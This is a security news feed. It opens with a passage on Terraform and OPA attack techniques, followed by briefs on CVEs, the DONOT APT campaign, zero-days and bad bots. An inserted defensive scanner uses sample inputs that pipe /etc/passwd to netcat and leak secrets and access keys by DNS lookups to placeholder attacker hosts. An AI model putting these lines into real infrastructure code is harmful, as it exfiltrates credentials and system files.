- Only use third-party components from trusted sources: modules and providers in Terraform, and policies in OPA (these are some examples of components that, when used from third parties, should be sourced cautiously).
- Verify their integrity to ensure no unauthorized changes were made prior to their execution.
- Set up application-level and cloud-level logging for monitoring and analysis.
- Limit the network and data access of the applications and the underlying machines. To prevent communication with other internal servers through OPA policies, as discussed in the attack techniques section, you may use OPA's capabilities.json file to restrict outbound network connections (using the allow_net field to restrict the hosts that can be contacted by the http.send and net.lookup_ip_addr functions).
- Scan before you plan! Prevent automatic execution of unreviewed and potentially malicious code in your CI/CD pipeline by placing your scanner before the terraform plan stage.**

**According to our testing, most common scanners fail to detect most of the risks we've discussed. Currently, in order to detect code execution and exfiltration techniques in IaC and PaC, you need to create custom policies according to your organization's needs and your environment's baseline.

For more details, watch the recording of our talk "Who Watches the Watchmen? Stealing Credentials from Policy-as-Code Engines (and beyond)" at the fwd:cloudsec Europe 2024 conference. You can find the slides here.

How Tenable Cloud Security can help

Shifting cloud security left helps you improve security and compliance before runtime. Tenable offers IaC scanning as part of Tenable Cloud Security, our comprehensive cloud native application protection platform (CNAPP). Tenable Cloud Security enables organizations to scan and detect misconfigurations and other risks in their IaC configurations to harden cloud infrastructure environments as part of the CI/CD pipeline and take action on cloud exposures. To get more information, check out our "Shift Left on Cloud Infrastructure Security" solution overview and go to our page "Shift-left with IaC security."
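As an added example (not Tenable's tooling and not code from the fwd:cloudsec talk), the Python below is a small "scan before you plan" check: it flags the Terraform data sources, provisioners and Rego built-ins discussed above in HCL and Rego files, and verifies that an OPA capabilities.json both prunes risky built-ins and pins allow_net to an allowlist. The rule names, regexes and the sample HCL, Rego and capabilities inputs are constructed for this example.

```python
"""Pre-plan scanner for the Terraform and OPA constructs this post describes.
Added example, not Tenable's tooling; the rule names and regexes are assumptions,
the constructs they match are the ones named in the text."""
import json
import re

# HCL blocks that execute code or reach the network as early as `terraform plan`.
HCL_RULES = {
    "hcl-external-data-source": re.compile(r'^\s*data\s+"external"\s+"'),
    "hcl-http-data-source": re.compile(r'^\s*data\s+"http"\s+"'),
    "hcl-dns-data-source": re.compile(r'^\s*data\s+"dns_[a-z_]+"\s+"'),
    "hcl-local-exec-provisioner": re.compile(r'^\s*provisioner\s+"local-exec"'),
    "hcl-remote-exec-provisioner": re.compile(r'^\s*provisioner\s+"remote-exec"'),
}

# Rego built-ins that read the OPA process environment or make outbound requests.
REGO_RULES = {
    "rego-http-send": re.compile(r"\bhttp\.send\s*\("),
    "rego-dns-lookup": re.compile(r"\bnet\.lookup_ip_addr\s*\("),
    "rego-runtime-env": re.compile(r"\bopa\.runtime\s*\("),
}


def scan_text(path, text):
    """Return [(line_number, rule_name)] for one file; extension picks the rule set."""
    rules = REGO_RULES if path.endswith(".rego") else HCL_RULES
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        code = line.strip()
        if code.startswith(("#", "//")):
            continue  # comment-only lines carry no executable construct
        findings.extend((lineno, rule) for rule, pat in rules.items() if pat.search(line))
    return findings


def risky_builtins_enabled(capabilities_json):
    """Names of network/env built-ins still listed in an OPA capabilities.json."""
    risky = {"http.send", "net.lookup_ip_addr", "opa.runtime"}
    caps = json.loads(capabilities_json)
    return sorted(risky & {b.get("name") for b in caps.get("builtins", [])})


def allow_net_restricted(capabilities_json, allowed_hosts):
    """True when allow_net exists and only names hosts from the allowlist.
    A missing allow_net lets http.send and net.lookup_ip_addr reach any host."""
    allow_net = json.loads(capabilities_json).get("allow_net")
    return allow_net is not None and set(allow_net) <= set(allowed_hosts)


# Constructed sample inputs modelled on the post's snippets (placeholders kept).
SAMPLE_HCL = '''
resource "aws_instance" "web" {
  # provisioner "local-exec" { command = "commented out, must not fire" }
  provisioner "local-exec" {
    command = "cat /etc/passwd | nc <attacker_server> 1337"
  }
}

data "dns_a_record_set" "superlegitdomain" {
  host = "${aws_secretsmanager_secret_version.password.secret_string}.<attacker_domain>"
}
'''

SAMPLE_REGO = '''
package dns_tunneling

parent_domain := "<attacker_domain>"

result = domain_str {
    domain_str := concat(".", [input.provider.aws[0].access_key, parent_domain])
    addr := net.lookup_ip_addr(domain_str)
}
'''

# Constructed capabilities.json: http.send stays enabled, but allow_net pins it to
# one internal host, so neither IMDS nor an external server is reachable.
SAMPLE_CAPABILITIES = json.dumps({
    "builtins": [{"name": "http.send", "decl": {"type": "function"}},
                 {"name": "concat", "decl": {"type": "function"}}],
    "allow_net": ["policy-bundle.internal"],
})


def run_sample():
    """Scan the constructed inputs and return a summary dict."""
    return {
        "hcl_rules": sorted({rule for _, rule in scan_text("main.tf", SAMPLE_HCL)}),
        "rego_rules": sorted({rule for _, rule in scan_text("policy.rego", SAMPLE_REGO)}),
        "risky_builtins": risky_builtins_enabled(SAMPLE_CAPABILITIES),
        "allow_net_ok": allow_net_restricted(SAMPLE_CAPABILITIES, ["policy-bundle.internal"]),
    }


if __name__ == "__main__":
    for key, value in run_sample().items():
        print(f"{key}: {value}")
```

Wire scan_text over every *.tf and *.rego file in the pull request as a CI step ahead of terraform plan, and fail the job on any finding that is not on your baseline.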
by Tenable
2024-11-18 08:56:15
APT41 expands cyberespionage to target Windows
DeepData, which has a layout identical to LightSpy and features a dozen infostealing-focused plugins, enables not only the exfiltration of data from browsers, password managers, and social networking apps, but also the recording of audio from its targets, according to an analysis from the BlackBerry Research and Intelligence Team.
by SC Media
2024-11-18 08:47:19
AnnieMac Home Mortgage breach impacts 171K
Infiltration of AnnieMac's systems between Aug. 21 and 23 resulted in the potential copying of individuals' names and Social Security numbers, said the New Jersey-based mortgage lender in breach notification letters, which noted the lack of evidence suggesting the dissemination of the exposed data on the dark web.
by SC Media
2024-11-18 08:42:16
Increased GDPR Enforcement Highlights the Need for Data Security
GDPR protects sensitive data like health and financial details, and its enforcement underscores the growing need for stronger data security measures. GDPR: The landscape of data privacy and protection has never been more critical. With regulators around the world intensifying scrutiny, companies are facing increasing pressure to comply with stringent data protection laws. The latest […]
by Security Affairs
2024-11-18 08:23:00
Splunk accelerates Cisco's security business as core networking sales decline
Security revenue doubled to $2 billion in Cisco's recent quarter. Without Splunk's contribution, its total revenue would have dropped 14%.
by Cybersecurity Dive
2024-11-18 08:18:00
Easterly to step down from CISA director role on Inauguration Day
CISA confirmed that political appointees of the Biden administration will also depart the agency as the Trump administration takes over.
by Cybersecurity Dive
2024-11-18 08:12:58
A week in security (November 11 – November 17)
A list of topics we covered in the week of November 11 to November 17, 2024.
by Malwarebytes Labs
2024-11-18 07:30:00
Final report on Nats calls for improvements to contingency process
by ComputerWeekly
2024-11-18 07:21:41
CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) has officially added two high-severity vulnerabilities affecting Palo Alto Networks Expedition to its Known Exploited Vulnerabilities (KEV) Catalog. The two Palo Alto Networks vulnerabilities, which are actively being targeted by cybercriminals, are identified as CVE-2024-9463 and CVE-2024-9465; both have critical severity ratings and are known to be actively exploited in real-world attacks. Organizations using affected versions of Palo Alto Networks Expedition are urged to take immediate action to mitigate the risks.

The vulnerabilities in question, CVE-2024-9463 (OS Command Injection) and CVE-2024-9465 (SQL Injection), impact Palo Alto Networks' Expedition software, a tool for migrating and optimizing PAN-OS configurations. The flaws have been assigned CVSSv4 scores of 9.9 and 9.2, respectively, signifying their high criticality. These vulnerabilities could allow attackers to gain unauthorized access to sensitive data or execute arbitrary commands on affected systems, posing serious risks to organizations' security.

Details of Palo Alto Networks Vulnerabilities: CVE-2024-9463 and CVE-2024-9465

The first vulnerability, CVE-2024-9463, is a critical OS command injection flaw that affects Palo Alto Networks Expedition. Assigned a CVSSv4 score of 9.9, this vulnerability allows unauthenticated attackers to execute arbitrary operating system commands on the affected system. If successfully exploited, this can compromise the integrity of the system, giving attackers the ability to disclose sensitive information. This includes usernames, cleartext passwords, device configurations, and API keys associated with PAN-OS firewalls, which are critical for securing network traffic.
Attackers exploiting this flaw can gain root access to these systems, making this vulnerability a prime target for those seeking to compromise firewall configurations and sensitive network data.

Another critical flaw, CVE-2024-9465, is a SQL injection vulnerability found in Expedition. This flaw, with a CVSSv4 score of 9.2, allows attackers to interact with and manipulate the system's database, exposing sensitive information such as password hashes, usernames, and device configurations. Exploiting this vulnerability could give attackers the ability to create and read arbitrary files on the system, which increases the risk of a full system compromise. Similar to CVE-2024-9463, the vulnerable version for CVE-2024-9465 is Expedition < 1.2.96. Additionally, proof-of-concept (PoC) exploits for this vulnerability have already been released to the public, escalating the risk of widespread attacks. As the PoC code is now accessible, it allows potential attackers to easily replicate the exploit and target vulnerable systems more efficiently.

Both CVE-2024-9463 and CVE-2024-9465 are critical vulnerabilities in the Expedition software suite. Organizations that are running versions of Expedition older than 1.2.96 are strongly advised to immediately update to the latest patched version. Given the severity and the ongoing active exploitation of these vulnerabilities, patching is crucial to protect sensitive information and maintain system security.

Cyble researchers have observed active exploitation of these flaws, with CVE-2024-9463 being particularly concerning due to its ability to grant attackers root-level access. This could result in a wide range of malicious activities, including data breaches, ransomware deployment, and unauthorized system modifications. Organizations should be particularly vigilant in monitoring their systems for signs of exploitation.
Recommendations and Mitigations

Palo Alto Networks has already released patches to address both vulnerabilities, and organizations are urged to upgrade to Expedition version 1.2.96 or later. However, simply applying the patch may not be enough. The following mitigation strategies are recommended:

- Organizations should immediately apply the latest patches released by Palo Alto Networks to close the vulnerabilities. Ensuring that systems are updated with the latest software versions will significantly reduce the risk of exploitation.
- After upgrading to the fixed version of Expedition, all Expedition usernames, passwords, and API keys should be rotated to prevent attackers from using previously exposed credentials to access systems. Similarly, any firewall usernames, passwords, and API keys processed by Expedition should also be updated to maintain system security.
- Organizations should implement comprehensive monitoring and logging solutions to detect suspicious activities. SIEM (Security Information and Event Management) tools can help organizations identify and respond to potential exploitation attempts in real time.
- Regular vulnerability assessments and penetration testing should be conducted to identify and address any other potential weaknesses. This proactive approach ensures that other unknown vulnerabilities are addressed.
- Organizations should have a well-defined incident response and recovery plan in place, which includes procedures for detecting, responding to, and mitigating the effects of an attack. Regular testing and updates to the plan are crucial to ensure readiness against online threats.

Conclusion

The inclusion of CVE-2024-9463 and CVE-2024-9465 in CISA's Known Exploited Vulnerabilities catalog highlights the urgent need for organizations to address these critical vulnerabilities in Palo Alto Networks Expedition.
With active exploitation ongoing, it is important for organizations using vulnerable versions to prioritize patching and apply recommended security measures. Delaying action could lead to severe data breaches and system compromises.

References:
- https://www.cisa.gov/news-events/alerts/2024/11/14/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://nvd.nist.gov/vuln/detail/cve-2024-9463
- https://nvd.nist.gov/vuln/detail/cve-2024-9465
by CYBLE
2024-11-18 07:16:07
APT Group DONOT Launches Cyberattack on Pakistan's Maritime and Defense Industry

A new hacker collective, known as the APT group DONOT, has targeted critical sectors of Pakistan's economy, specifically the maritime and defense manufacturing industries. By leveraging advanced malware and targeted social engineering strategies, the DONOT hacker group has successfully compromised sensitive infrastructure.

As per reports by Cyble Research and Intelligence Labs (CRIL), the APT group DONOT, also known as APT-C-35, has been active since 2016 and is primarily recognized for its persistent cyber espionage activities. Historically, this hacker group has focused on government agencies, military entities, and diplomatic missions, with particular emphasis on countries in South Asia. Its operations are characterized by a high degree of stealth, using sophisticated malware and custom-built tools to infiltrate target networks.

The Rise of APT Group DONOT

Figure: Cyble Vision Threat Library (Source: Cyble)

The DONOT hacker group has previously attacked organizations by exploiting vulnerabilities in government and military systems, often using phishing emails and malicious attachments as initial infection vectors. This time, however, their focus has shifted to Pakistan's critical manufacturing sectors, which support the country's maritime and defense industries. Given the sensitive nature of these sectors, the attack has profound implications for both economic stability and national security.

The recent cyberattack, which Cyble researchers first identified in a report, centers on a campaign targeting the manufacturing facilities that supply equipment for Pakistan's defense and maritime sectors. This targeted approach suggests that the DONOT hacker group is not just interested in gaining general access to systems, but rather in obtaining specific industrial and military intelligence.
The initial infection vector in this campaign was a malicious LNK (shortcut) file, which was sent in a spam email disguised as a legitimate Rich Text Format (RTF) document. This LNK file was designed to appear as though it contained encrypted data, enticing the victim to open it. Once clicked, the file triggered several PowerShell commands that downloaded additional malware, including a DLL file that acted as a "stager" for further exploits.

Upon execution, the malicious LNK file activated a series of commands that used PowerShell scripts to download and decrypt further payloads. These payloads were then deployed onto the compromised system, establishing a foothold that allowed the malware to persist on the infected machine. To maintain access to the network, the malware scheduled a task to execute the payload every five minutes.

Advanced Malware and Persistence Mechanisms

The malware employed by the DONOT hacker group in this attack is highly advanced, utilizing multiple encryption techniques to avoid detection by traditional security systems. The group introduced a new method of Command and Control (C&C) server communication. The malware uses AES encryption and Base64 encoding to obfuscate its communications, making it more difficult for security software to identify malicious activity.

Once the malware established its presence, it initiated a POST request to the primary C&C server, transmitting a unique device ID to authenticate the compromised machine. If the C&C server responded positively, the malware would download further payloads, configure the system for persistence, and prepare for additional stages of the attack.

In addition to encrypting communication between the victim machine and the C&C server, the hacker group DONOT also employed random domain generation for backup C&C servers. This strategy ensures that, even if the primary server is taken down, the malware can continue to operate through secondary, dynamically generated domains.
Technical Analysis: How the Attack Unfolded

Figure: Infection Chain of APT Group DONOT (Source: Cyble)

The malicious process begins with the execution of a PowerShell script hidden inside the LNK file. This script decrypts both the lure RTF file and the DLL payload using a simple XOR operation. The files are then extracted to the victim's temporary directory. Following extraction, the malware deletes the PowerShell script and opens the lure document to further entice the victim. The lure document itself was linked to Karachi Shipyard & Engineering Works (KS&EW), a prominent Pakistani defense contractor. This suggests that the attacker's primary objective was to infiltrate the defense sector by exploiting industry-specific targets.

Once the DLL is executed, it initiates a process that extracts critical configuration data, including server addresses, encryption keys, and other task parameters, from an embedded JSON file. The malware then uses this information to communicate securely with the C&C server, requesting further instructions on how to proceed with the attack.

The stager malware also checks for the existence of a scheduled task named "Schedule." If this task is absent, the malware creates it, ensuring that the malicious DLL is executed every five minutes, thereby maintaining persistence on the compromised system. This tactic is part of a broader strategy to ensure the malware continues to run undetected for as long as possible.

Random Domain Generation for Backup C&C Servers

A particularly notable feature of this attack is the use of random domain generation. The DONOT hacker group has taken extra precautions to avoid detection by generating backup domains for its C&C servers. These domains are created by concatenating words from a hardcoded array of values, followed by the selection of a random top-level domain (TLD).
This dynamic method of domain generation makes it harder for cybersecurity teams to shut down the C&C infrastructure, even if some of the domains are blacklisted. The configuration file also includes fallback server URLs that are periodically updated in response to changes in the primary C&C server''s status. This flexibility ensures that the hacker group can maintain control over compromised systems, regardless of disruptions to their communication infrastructure. New Encryption Methods and Payload Delivery In this campaign, the DONOT hacker group introduced a more sophisticated approach to payload delivery. Unlike previous campaigns where the decryption key was hardcoded into the configuration file, this time, the decryption key was embedded within the binary itself, making it harder for analysts to detect. The malware''s ability to download, decrypt, and execute additional payloads represents a more advanced and nuanced approach to cyber espionage. Once the payload is successfully decrypted, the malware creates a scheduled task to execute the final payload, which could range from data exfiltration tools to additional malicious code capable of causing long-term damage to the compromised systems. The recent cyberattack by the DONOT APT group marks a significant escalation in their tactics, using advanced methods like PowerShell exploitation, dynamic domain generation, and enhanced encryption to evade detection. This attack, targeting Pakistan''s sensitive maritime and defense sectors, highlights the growing threat posed by such sophisticated groups. To counter this, organizations must strengthen cybersecurity defenses by deploying robust endpoint detection, conducting regular audits, and training employees to recognize phishing attempts. Proactive threat hunting and a clear incident response plan are essential to defending against future attacks. Vigilance and preparedness remain critical in mitigating the risks from advanced persistent threats like DONOT.
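The persistence step described above (a scheduled task, named "Schedule", that re-runs the DLL from the temporary directory every five minutes) is also what a defender can audit for. The following is an added example, not code from Cyble or from the report: it parses Task Scheduler XML task definitions and flags that pattern. Assumed rather than stated on the page: that the DLL is launched through rundll32 or regsvr32, and the two sample task definitions, which are constructed.

```python
r"""Audit Windows Task Scheduler XML definitions for the persistence pattern
described in the article: a task that fires every five minutes (or faster)
and runs a DLL out of a temp directory.

Added example; not code from Cyble or from the malware. The XML layout and the
task namespace are the standard on-disk format under C:\Windows\System32\Tasks.
Both sample tasks below are constructed.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from pathlib import Path
from typing import List, Optional

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
MAX_INTERVAL_SECONDS = 5 * 60  # the five-minute cadence the article reports
TEMP_DIR = re.compile(r"\\Temp\\|%TEMP%|\\AppData\\Local\\Temp", re.IGNORECASE)
# Assumption: the article says the DLL "is executed" but names no host process;
# rundll32/regsvr32 are the usual DLL loaders, so treat either as the host.
DLL_HOST = re.compile(r"rundll32|regsvr32", re.IGNORECASE)


@dataclass
class Finding:
    task_name: str
    interval_seconds: Optional[int]   # shortest repetition interval, if any
    command: str                      # command line(s) the task executes
    reasons: List[str] = field(default_factory=list)


def iso_duration_seconds(text: str) -> Optional[int]:
    """Parse the ISO-8601 duration subset Task Scheduler uses (PnDTnHnMnS)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", text.strip())
    if not m:
        return None
    days, hours, minutes, seconds = (int(g) if g else 0 for g in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def audit_task(task_name: str, xml_text) -> Finding:
    """Score one task definition; str or bytes (real files are UTF-16) accepted."""
    root = ET.fromstring(xml_text)
    intervals = [iso_duration_seconds(e.text or "")
                 for e in root.iterfind(".//t:Repetition/t:Interval", NS)]
    intervals = [i for i in intervals if i is not None]
    shortest = min(intervals) if intervals else None

    parts = []
    for ex in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS)
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        parts.append(f"{cmd} {args}".strip())
    command = " ; ".join(parts)

    finding = Finding(task_name, shortest, command)
    if shortest is not None and shortest <= MAX_INTERVAL_SECONDS:
        finding.reasons.append(f"repeats every {shortest}s")
    if TEMP_DIR.search(command):
        finding.reasons.append("runs a file from a temp directory")
    if DLL_HOST.search(command) and ".dll" in command.lower():
        finding.reasons.append("loads a DLL through a host process")
    if task_name.lower() == "schedule":
        finding.reasons.append('generic task name "Schedule" reported in the campaign')
    return finding


def is_suspicious(f: Finding) -> bool:
    """Fast repetition alone is common (monitoring agents); require a second signal."""
    fast = f.interval_seconds is not None and f.interval_seconds <= MAX_INTERVAL_SECONDS
    return fast and len(f.reasons) >= 2


def audit_tasks_dir(tasks_dir=r"C:\Windows\System32\Tasks") -> List[Finding]:
    """Walk the on-disk task store; each file name is the task name."""
    return [audit_task(p.name, p.read_bytes())
            for p in Path(tasks_dir).rglob("*") if p.is_file()]


# Constructed sample: the article's stager re-launched every five minutes.
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT5M</Interval></Repetition>
    <StartBoundary>2024-11-01T09:00:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>rundll32.exe</Command>
    <Arguments>C:\Users\alice\AppData\Local\Temp\stager.dll,Start</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed sample: a nightly job with no repetition and a normal install path.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger>
    <StartBoundary>2024-11-01T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
  </CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Program Files\Backup\backup.exe</Command><Arguments>/nightly</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml in (("Schedule", SUSPICIOUS_TASK), ("NightlyBackup", BENIGN_TASK)):
        f = audit_task(name, xml)
        print(f"{name}: suspicious={is_suspicious(f)} reasons={f.reasons}")
```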
by The Cyber Express
2024-11-18 07:08:15
Microsoft 365 Admin portal abused to send sextortion emails
The Microsoft 365 Admin Portal is being abused to send sextortion emails, making the emails appear trustworthy and bypassing email security platforms. [...]
by BleepingComputer
2024-11-18 07:04:51
Critical Really Simple Security plugin flaw impacts 4M+ WordPress sites
A Really Simple Security plugin flaw affects 4M+ sites, allowing attackers full admin access. It’s one of the most critical WordPress vulnerabilities ever. Wordfence researchers warn of a vulnerability, tracked as CVE-2024-10924 (CVSS Score of 9.8), in the Really Simple Security plugin that affects 4M+ sites. The Really Simple Security plugin, formerly Really Simple SSL, is […]
by Security Affairs
2024-11-18 07:00:45
How to increase cyber resilience
Making your organization’s attack surface lean and agile improves your cyber resilience and demotivates bad actors. The first step to avoid cyber attacks is to get your attack surface in order. The Sweepatic External Attack Surface Management (EASM) Platform is built to help you with building cyber resilience. It lists, structures and prioritizes observations by […] The post How to increase cyber resilience appeared first on Outpost24.
by Outpost24
2024-11-18 06:45:50
Building a Powerful Packet Sniffing Tool with Python
A Practical Guide to Network Traffic Analysis for Developing an Advanced Packet Sniffer
Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-11-18 06:45:30
Ticketmaster Data Breach Potentially Impacts 560 Million Customers
Cybercrime Group ShinyHunters Demands £400,000 Ransom to Prevent Data Sale
Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-11-18 06:45:19
SSRF to Internal Port Scanning on Self-Hosted Platform
Free Articles
Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-11-18 06:44:35
Zero Day Exploit

Zero-Day Exploits: Uncovering the Secrets of Cyber Attacks Before They’re Even Known!

Have You Ever Wondered What a “Zero-Day” Attack Really Is?

Picture this: You’re peacefully going about your day, working on your computer, checking your emails, maybe even doing a little online shopping. But little do you know, a hacker has discovered a secret door to your computer — a hidden vulnerability that no one knows about, not even the company that made your software. That’s a Zero-Day Exploit.

So, what’s a Zero-Day, and why is it such a big deal in the cybersecurity world? In simple terms, a Zero-Day Exploit refers to an attack that takes advantage of a software flaw that is unknown to the software vendor. In other words, it’s a bug that no one knows exists until an attacker finds it and uses it. That’s why it’s called “Zero-Day” — the vendor has had zero days to fix it before the bad guys strike!

How Do These Attacks Happen? Let’s Break It Down!

Let’s take a quick journey into the world of hacking. Think of a Zero-Day like a treasure map — you know, the kind where the “X” marks the spot. Here’s how the treasure hunt goes down:

Discovery: First, an attacker or a researcher stumbles upon a vulnerability — like a hidden flaw in a website, app, or even a big operating system like Windows or Android. They might find it by accident or through clever searching.

Example: Imagine you’re a hacker who finds that a popular video game app has a bug that lets you access other players’ accounts. No one knows about it, so you’re the first to discover this hidden weakness.

Weaponization: Now, the attacker turns this discovery into a weapon. They write malicious code that uses the flaw to hack into systems, steal data, or do something far worse. It’s like building a tool to open a lock that no one has the key to.

Exploitation: The attacker uses the weapon (exploit) to break into a system and cause havoc. This is where things get serious — because no patch is available yet, everyone’s vulnerable!

The Dangerous Life of a Zero-Day

Let’s say you’re using a well-known application, and suddenly, an attacker uses a Zero-Day exploit against you. It’s like someone breaking into your house through a window you didn’t even know existed.

Here’s how the whole drama unfolds in real-time:

Vulnerability: The flaw exists but is hidden. You have no clue it’s there.
Discovery: A hacker, researcher, or exploit developer finds this flaw and decides to make use of it.
Weaponization: The flaw is turned into an exploit (a “tool” to take advantage of it).
Exploitation: The bad guys launch the exploit, often infecting thousands or millions of systems before anyone knows what’s happening.
Discovery and Fix: Finally, the software vendor finds out and quickly releases a patch. But by now, the damage might already be done.

The Real-World Impact of Zero-Day Exploits

You might be wondering, “Okay, this sounds scary, but has it really caused any chaos?” Let’s look at some mind-blowing examples!

1. Stuxnet: The Cyberweapon that Broke the Internet (and a Nuclear Facility!)

One of the most famous examples of a Zero-Day exploit is the Stuxnet worm. This isn’t just any hacker story — this is the tale of how a computer virus used multiple Zero-Day vulnerabilities to sabotage Iran’s nuclear enrichment facility. Stuxnet wasn’t just an ordinary virus; it was a cyberweapon designed to physically destroy equipment!

Imagine this: A computer virus spreads through networks, finds its target, and then, instead of stealing data, it breaks the machinery of a nuclear plant. All done through several hidden vulnerabilities that no one knew about until it was too late. The world had zero days to prepare.

2. The Apple FaceTime Bug (2019)

In 2019, a Zero-Day vulnerability was discovered in Apple’s FaceTime app. If you called someone using FaceTime, the phone would start recording the call before they even answered! Yikes, right? The bug allowed a person to listen to someone’s private conversation without their knowledge.

This was a big deal. Imagine you’re chatting with a friend, and someone is secretly listening in! Apple quickly patched the issue, but the damage was done. This example shows how dangerous Zero-Day exploits can be, even in something as everyday as a video call app.

Why Are Zero-Day Exploits So Dangerous?

Here’s why Zero-Day exploits are such a nightmare:

No Warning: There’s no “heads-up” before the exploit is used. You’re simply caught off guard, and by the time a patch comes out, the attacker has already done their damage.
Wide-Scale Impact: If the flaw exists in a widely-used app, like a browser or operating system, millions of people could be affected. The more popular the software, the greater the risk.
Targeted Attacks: While some Zero-Days are used in widespread attacks, others are extremely targeted. Governments, companies, and high-profile individuals can be victims of highly specific Zero-Day exploits.

How Can You Protect Yourself?

While it’s hard to fully protect yourself from Zero-Day attacks (since, well, the exploit is unknown), there are some steps you can take to stay safe:

Regularly Update Your Software: Even though Zero-Day vulnerabilities are unknown, patching known vulnerabilities is your best defense. Stay on top of your software updates!
Tip: Turn on automatic updates! No more clicking “remind me later.”
Use Endpoint Security: Tools like EDR (Endpoint Detection and Response) can help detect unusual activities and prevent exploits from spreading, even before they’re patched.
Be Careful with Downloads: Avoid downloading software from untrusted sources. Even if an attacker hasn’t discovered a Zero-Day yet, they might try to exploit your computer through other means.
Network Segmentation: If you’re managing a business or a larger network, dividing your network into smaller parts can help limit the spread of an attack. Even if a Zero-Day hits, it won’t wreak havoc across your entire system.
Use Strong Passwords and Multi-Factor Authentication (MFA): Even if attackers get into one system, strong passwords and MFA make it harder for them to break further into your network.

Zero-Day: A Real Game of Cat and Mouse

The Zero-Day world is a bit like an intense game of hide-and-seek, with hackers hunting for vulnerabilities and developers racing against time to fix them. Every day, new flaws are discovered, and new attacks are launched. But here’s the fun part — this game is far from over! The cybersecurity community is always discovering new ways to detect and prevent these types of attacks.

So, while Zero-Day exploits are a serious threat, they also serve as a reminder of the constant need for cyber vigilance and innovation. Staying curious and keeping up with cybersecurity trends is key to being one step ahead.

Final Thoughts

Zero-Day exploits might sound like something straight out of a cyber-thriller, but they are real, and they’re constantly evolving. They remind us how vulnerable and exposed we are in the digital world — and why we need to be constantly aware of the risks and defenses that shape our online lives.

Just remember: In cybersecurity, the game is always changing. And the more we understand, the better we can defend ourselves!

Zero Day Exploit was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2024-11-18 06:44:29
OWASP Top 10–2021 Tryhackme Writeup
Learn about OWASP's Top 10 – 2021 web security flaws findings
Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-11-18 06:43:46
Bad Bots: The Unseen Cyber Threat and the Fight to Secure the Internet

Introduction

The internet ecosystem, vital for global communication, commerce, and innovation, is increasingly polluted by “bad bots” — malicious automated programs that conduct various nefarious activities. From data scraping and credential stuffing to orchestrating denial-of-service attacks, bots have grown both in volume and sophistication.

By 2023, bots accounted for 47% of all internet traffic, with bad bots responsible for over 30% of that share. This dominance reflects a major threat to businesses globally, with an estimated $40 billion lost annually due to bot-related activities. During key periods, such as holiday shopping seasons, bot traffic can surge beyond 30%, making it harder for website owners to differentiate between legitimate users and malicious traffic.

Interesting facts further highlight the gravity of the situation:

1 second of page load delay caused by bot-induced server overload can reduce conversion rates by 7%.
50% of login attempts globally are linked to bots attempting credential stuffing.
Bots often exploit older mobile app versions, which may lack updated defenses, during the transition to newer versions.

The race between bot evolution and countermeasures continues to shape cybersecurity strategies.

The Scope of the Bot Problem

Bad bots make up nearly 30% of all internet traffic, a startling figure that highlights the widespread nature of the problem. This bot-driven traffic is responsible for costing businesses over $40 billion annually. Bots are increasingly targeting all aspects of the web, from scraping content and pricing data to conducting sophisticated fraud schemes like credential stuffing and account takeovers.

The First Generation: Basic Automation

Characteristics

The first-generation bots, emerging in the early 2000s, were simplistic and relied on basic scripts written in languages like Python, PHP, or Perl. They targeted HTTP endpoints using direct, rule-based logic. Their operations were straightforward but effective for early threats.

Examples of Malicious Activities

Web Scraping: Automated tools like curl and BeautifulSoup extracted product pricing, proprietary data, or entire web pages.
Spamming: Bots automated form submissions to post advertisements or send phishing messages.
Credential Stuffing: Exploited breached credentials to access user accounts via repetitive HTTP POST requests.

How Organizations Responded

Static IP Blocking: Analyzed server logs for repeated requests and blocked suspicious IPs via firewalls like iptables. Limitations: Proxy servers quickly bypassed IP blocks.
Rate-Limiting and Throttling: Controlled traffic flow using tools like Nginx modules.
CAPTCHAs: Early CAPTCHAs challenged users with text or image recognition tasks. However, these slowed legitimate users and were ineffective against advanced automation.

The Second Generation: Stealth and Mimicry

As first-generation defenses matured, bots evolved. Second-generation bots were stealthier and designed to mimic human behavior.

Advancements

IP Rotation: Used proxy pools like ProxyMesh to evade static IP blocking.
Headless Browsers: Tools such as Puppeteer and Selenium could execute JavaScript, bypassing detection based on client-side scripts.
Behavioral Mimicry: Generated randomized mouse movements and typing delays to resemble human interactions.

Challenges and Countermeasures

Credential Stuffing at Scale: Sophisticated frameworks like Sentry MBA exploited login portals.
Behavioral Analytics: Machine learning models analyzed anomalies in interaction patterns to flag bots.
Dynamic CAPTCHAs: Risk-based challenges were introduced but were increasingly bypassed using CAPTCHA-solving services like 2Captcha.

The Third Generation: AI-Driven Bots

Third-generation bots integrated machine learning for adaptability and decision-making, pushing bot sophistication to unprecedented levels.

Capabilities

Machine Learning Mimicry: Bots trained on datasets to replicate human interactions, including navigation paths and click sequences.
API Exploitation: Targeted GraphQL APIs to extract data, bypassing web GUIs entirely.
Autonomy: Bots self-optimized their attack strategies using feedback from failed attempts.

Defensive Challenges

